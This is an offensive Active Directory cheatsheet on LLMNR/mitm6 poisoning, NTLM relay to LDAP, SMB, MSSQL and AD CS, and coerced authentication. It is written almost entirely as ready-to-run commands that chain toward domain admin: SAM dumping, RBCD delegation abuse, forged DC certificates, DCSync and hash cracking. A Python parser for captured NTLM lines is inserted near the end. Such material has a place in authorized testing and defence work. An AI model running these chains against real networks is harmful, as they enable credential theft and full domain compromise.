LLMNR & NTLM Relay

Capture NTLM hashes from broadcast poisoning, or relay them straight into LDAP/SMB/HTTP for instant compromise. Often the path from zero creds to domain admin.

DC=10.10.11.50
DOMAIN=corp.local
ATTACKER=10.10.14.1

i. Quick map of the chain

  1. Capture or coerce an NTLM auth from a victim
  2. Relay that auth to a target service (LDAP, LDAPS, SMB, HTTP cert enroll, MSSQL)
  3. Action: dump SAM, write ACL, request a cert, add RBCD, get a TGT

What’s relayable depends on:

  • SMB signing required? -> can’t relay to SMB
  • LDAP signing + channel binding enforced? -> can’t relay to LDAP/LDAPS
  • HTTPS cert enrollment open without channel binding? -> ESC8 relay
  • Coerced auth source (machine vs user) determines what you can do at the target

Check signing posture first:

nxc smb $DC                         ## shows signing in the host banner
nxc ldap $DC                        ## shows LDAP signing + channel binding
nxc smb 10.10.11.0/24 --gen-relay-list relay.txt   ## auto-builds list of SMB-signing-not-required targets

ii. Responder, LLMNR/NBT-NS/MDNS poisoning

Default install at /usr/share/responder. Disable Responder's own HTTP and SMB listeners if ntlmrelayx will be handling those protocols:

sudo responder -I eth0 -wv
## Quieter, only analyze (no poisoning):
sudo responder -I eth0 -A
## When pairing with ntlmrelayx, turn off SMB+HTTP so they don't conflict:
sudo sed -i 's/SMB = On/SMB = Off/; s/HTTP = On/HTTP = Off/' /usr/share/responder/Responder.conf
sudo responder -I eth0 -wv

Output paths:

  • Captured hashes: /usr/share/responder/logs/
  • Session log (all activity): Responder-Session.log
  • Hashes by protocol: <protocol>-NTLMv2-SSP-<IP>.txt

Crack with hashcat -m 5600 for NetNTLMv2:

hashcat -m 5600 hash.txt rockyou.txt -r OneRuleToRuleThemAll.rule

iii. mitm6, IPv6 DHCPv6 takeover

Way more effective than LLMNR on modern networks because IPv6 is on by default but usually unconfigured. mitm6 answers DHCPv6 and advertises itself as the DNS server; Windows prefers the IPv6 DNS server, so DNS queries route to you.

## Drop attacker as DNS server for the domain:
sudo mitm6 -i eth0 -d $DOMAIN
## Then pair with ntlmrelayx, see below

Combine with WPAD spoofing for browser auth:

sudo responder -I eth0 -wv -F      ## -F forces auth on wpad.dat retrieval (NTLM by default, add -b for Basic)

iv. ntlmrelayx targets and outcomes

The relay target dictates the outcome. Pick the one that gives you the biggest win.

Relay to LDAP/LDAPS, add a computer (when MachineAccountQuota > 0) and grant it RBCD on victim:

sudo impacket-ntlmrelayx -t ldaps://$DC --delegate-access --escalate-user pwnuser --no-smb-server -smb2support
## Or write a user's ACL to give yourself control:
sudo impacket-ntlmrelayx -t ldaps://$DC --escalate-user attacker

Relay to SMB to dump SAM on a target without signing:

sudo impacket-ntlmrelayx -tf relay.txt -smb2support
## With SOCKS proxy so all relayed sessions become reusable:
sudo impacket-ntlmrelayx -tf relay.txt -smb2support -socks

Relay to AD CS Web Enrollment (ESC8), get a cert for the victim:

sudo impacket-ntlmrelayx -t http://ca.corp.local/certsrv/certfnsh.asp --adcs --template DomainController -smb2support
## Or with certipy directly:
sudo certipy relay -target 'http://ca.corp.local'
sudo certipy relay -target 'http://ca.corp.local' -template DomainController

Relay to MSSQL:

sudo impacket-ntlmrelayx -t mssql://$DC -smb2support

Multi-target relay

ntlmrelayx with -tf reads a target file (one per line). When a coerced authentication hits the relay, ntlmrelayx tries all targets in parallel. Combined with -socks, every successful relay becomes a reusable session.

v. Coercion methods

Hash capture is opportunistic. Coercion FORCES a target to authenticate to you. Way more reliable.

Coercer, the unified tool, tests all known methods:

## Scan to see what works on target:
coercer scan -t $DC -u $USER -p $PASS -d $DOMAIN
## Coerce against attacker listener:
coercer coerce -l $ATTACKER -t $DC -u $USER -p $PASS -d $DOMAIN
## With hash:
coercer coerce -l $ATTACKER -t $DC -u $USER -H $NTHASH -d $DOMAIN
## Filter to a single method:
coercer coerce -l $ATTACKER -t $DC -u $USER -p $PASS -d $DOMAIN --filter-method-name EfsRpcOpenFileRaw

Method-specific tools (sometimes more reliable than Coercer):

PetitPotam (MS-EFSR) - works unauth on legacy DCs, auth on patched:

impacket-petitpotam -d $DOMAIN -u $USER -p $PASS $ATTACKER $DC
## Unauth (legacy, pre-July-2022 patches):
impacket-petitpotam $ATTACKER $DC

PrinterBug (MS-RPRN) - Spooler service must be running:

impacket-printerbug "$DOMAIN/$USER:$PASS"@$DC $ATTACKER
## Check if Spooler is on:
rpcdump.py "$DOMAIN/$USER:$PASS"@$DC | grep -A2 MS-RPRN

DFSCoerce (MS-DFSNM) - DFS service, very reliable on DCs:

dfscoerce.py -u $USER -p $PASS -d $DOMAIN $ATTACKER $DC

ShadowCoerce (MS-FSRVP) - File Server VSS Agent service:

shadowcoerce.py -u $USER -p $PASS -d $DOMAIN $ATTACKER $DC

vi. The classic chains

Chain 1: mitm6 + ntlmrelayx -> create attacker-owned computer with delegation

## Terminal 1: poison IPv6
sudo mitm6 -i eth0 -d $DOMAIN
## Terminal 2: relay LDAPS, ask for new computer + delegation
sudo impacket-ntlmrelayx -6 -t ldaps://$DC -wh fakewpad.$DOMAIN --delegate-access
## Wait for Windows hosts to renew DHCPv6 / DNS, all calls route to mitm6
## When a user (or computer) browses to anything, NTLM goes to relay
## Output: new computer object e.g. ATTACKERSYSTEM$ with password, and RBCD on the source

After this, run impacket-getST with the new computer’s credentials to impersonate Administrator:

impacket-getST -spn cifs/victim.corp.local -impersonate Administrator \
  "$DOMAIN/ATTACKERSYSTEM\$:$NEWPASS" -dc-ip $DC

See Delegation for the RBCD exploitation step.

Chain 2: PetitPotam -> relay to AD CS HTTP (ESC8)

Get DC certificate, authenticate as DC$, full DCSync:

## Terminal 1: relay to ADCS web enrollment
sudo certipy relay -target 'http://ca.corp.local' -template DomainController
## Terminal 2: coerce DC to authenticate
impacket-petitpotam -d $DOMAIN -u $USER -p $PASS $ATTACKER $DC
## certipy saves a .pfx for the DC computer account
## Authenticate with it:
certipy auth -pfx dc.pfx -dc-ip $DC
## Output: NT hash of DC$ -> DCSync, see https://jinpwn.dev/cheatsheets/active-directory/ad12-dcsync/

Chain 3: Responder + ntlmrelayx for SMB lateral

Capture a user, relay to a host where SMB signing is off:

## Terminal 1: relay with auto-dump of SAM
sudo impacket-ntlmrelayx -tf relay.txt -smb2support
## Terminal 2: poison broadcasts
sudo responder -I eth0 -wv
## Wait for a privileged user to mistype a hostname
## ntlmrelayx will dump SAM on every host the user is admin on

vii. SOCKS mode for persistent sessions

-socks keeps every successful relay alive as a SOCKS endpoint:

sudo impacket-ntlmrelayx -tf relay.txt -smb2support -socks
## In ntlmrelayx prompt:
ntlmrelayx> socks
## Lists available SOCKS sessions
ntlmrelayx> targets

## On attacker, use proxychains with one of the sessions:
proxychains -q nxc smb victim.corp.local -u user -p anything   ## password ignored, uses relayed auth
proxychains -q impacket-secretsdump user:anything@victim.corp.local

viii. LDAP signing and channel binding bypass

If LDAP signing is required, raw LDAP relay fails. LDAPS works only if Channel Binding (EPA) is not enforced.

Check status:

nxc ldap $DC                                  ## prints signing + channel binding in banner
nxc ldap $DC -M ldap-checker

When both are enforced, you can’t relay to LDAP. Pivot to:

  • ESC8 (relay to HTTP/HTTPS cert enrollment)
  • SMB relay if any host has signing off (--gen-relay-list)
  • ESC11 (relay to ICPR RPC if encryption not enforced)

ix. WebDAV trick for HTTP auth

When SMB and LDAP relays fail, force the target's WebClient service to authenticate over HTTP (WebDAV); HTTP-sourced NTLM can be relayed to more targets than SMB-sourced NTLM:

## Trigger WebDAV outbound from the victim:
## Use a UNC path with @ symbol that points to your attacker
## e.g. \\10.10.14.1@80\share\test
## In Coercer:
coercer coerce -l "$ATTACKER@80/x" -t $DC -u $USER -p $PASS -d $DOMAIN

Then relay the HTTP auth to LDAP. NTLM that originates from SMB carries the signing negotiate flag, which the LDAP server honours; WebDAV/HTTP-originated NTLM does not, so the relay succeeds unless LDAP signing is actually enforced (see viii):

sudo impacket-ntlmrelayx -t ldaps://$DC --delegate-access --no-smb-server

x. NTLMv1 downgrade

Old/misconfigured systems still accept NTLMv1, which is trivially crackable via crack.sh rainbow tables. When relaying or capturing, check for NTLMv1:

sudo responder -I eth0 -wv --lm                ## force LM/NTLMv1
## If captured, crack.sh service gives the NT hash within hours
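The capture lines Responder writes (section ii, the hashcat 5600 format) and the NTLMv1 lines this section warns about can be triaged offline. The following is an added example, not Responder's or the original cheatsheet's code: it classifies a line as NetNTLMv1 or NetNTLMv2 and unpacks the NTLMv2 client blob, whose TargetName and ChannelBindings AV pairs are the values that EPA/channel binding (section viii) checks. The sample lines, including the jdoe/CORP/dc01 names, are constructed.

```python
import struct
from datetime import datetime, timedelta, timezone

# AV_PAIR ids from MS-NLMP 2.2.2.1; TargetName and ChannelBindings are what EPA checks
AV_NAMES = {1: "NbComputerName", 2: "NbDomainName", 3: "DnsComputerName", 4: "DnsDomainName",
            5: "DnsTreeName", 6: "Flags", 7: "Timestamp", 8: "SingleHost", 9: "TargetName",
            10: "ChannelBindings"}

def filetime_to_iso(ft):  # Windows FILETIME: 100 ns ticks since 1601-01-01 UTC
    return (datetime(1601, 1, 1, tzinfo=timezone.utc) + timedelta(microseconds=ft // 10)).isoformat()

def parse_av_pairs(data):  # LE uint16 id, LE uint16 length, value ... until MsvAvEOL (id 0)
    pairs, off = {}, 0
    while off + 4 <= len(data):
        av_id, av_len = struct.unpack_from("<HH", data, off)
        if av_id == 0:
            break
        val, off = data[off + 4:off + 4 + av_len], off + 4 + av_len
        name = AV_NAMES.get(av_id, "Unknown%d" % av_id)
        if av_id in (1, 2, 3, 4, 5, 9):
            pairs[name] = val.decode("utf-16-le")           # UTF-16LE strings
        elif av_id == 7:
            pairs[name] = filetime_to_iso(struct.unpack("<Q", val)[0])
        else:
            pairs[name] = val.hex()                          # Flags, SingleHost, channel binding hash
    return pairs

def parse_capture_line(line):  # Responder/hashcat line -> NetNTLMv1 (mode 5500) or v2 (mode 5600)
    parts = line.strip().split(":")
    if len(parts) != 6 or parts[1] != "":
        raise ValueError("not a NetNTLM capture line")
    user, _, domain, f1, f2, f3 = parts
    if len(f1) == 48 and len(f2) == 48 and len(f3) == 16:    # LM resp, NT resp, server challenge
        return {"version": "NetNTLMv1", "user": user, "domain": domain}
    if len(f1) == 16 and len(f2) == 32 and f3.startswith("0101"):  # challenge, NTProofStr, blob
        blob = bytes.fromhex(f3)
        return {"version": "NetNTLMv2", "user": user, "domain": domain,
                "time": filetime_to_iso(struct.unpack_from("<Q", blob, 8)[0]),
                "client_challenge": blob[16:24].hex(),
                "av": parse_av_pairs(blob[28:])}              # AV pairs follow 4 reserved bytes
    raise ValueError("unrecognised field lengths")

# Constructed sample lines (not real captures). The v2 blob carries NbDomainName CORP, NbComputerName
# DC01, a timestamp, Flags with the MIC bit, TargetName ldap/dc01.corp.local, all-zero ChannelBindings.
SAMPLE_V2 = ("jdoe::CORP:1122334455667788:0123456789abcdef0123456789abcdef:"
             "0101000000000000" "000000000000d901" "8877665544332211" "00000000"
             "02000800" "43004f0052005000" "01000800" "4400430030003100"
             "07000800" "000000000000d901" "06000400" "02000000"
             "09002800" "6c006400610070002f00" "64006300300031002e00" "63006f00720070002e00" "6c006f00630061006c00"
             "0a001000" + "00" * 16 + "00000000" "00000000")
SAMPLE_V1 = "jdoe::CORP:" + "a" * 48 + ":" + "b" * 48 + ":1122334455667788"
```

An all-zero ChannelBindings value means the client bound no TLS channel into the response, which is exactly what an LDAPS server with channel binding enforced rejects; the Timestamp tells you when the capture happened.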

xi. After relay

Always run BloodHound after a successful relay attack. New computer objects, new RBCD edges, and any ACL writes change the graph significantly. See BloodHound for re-collection.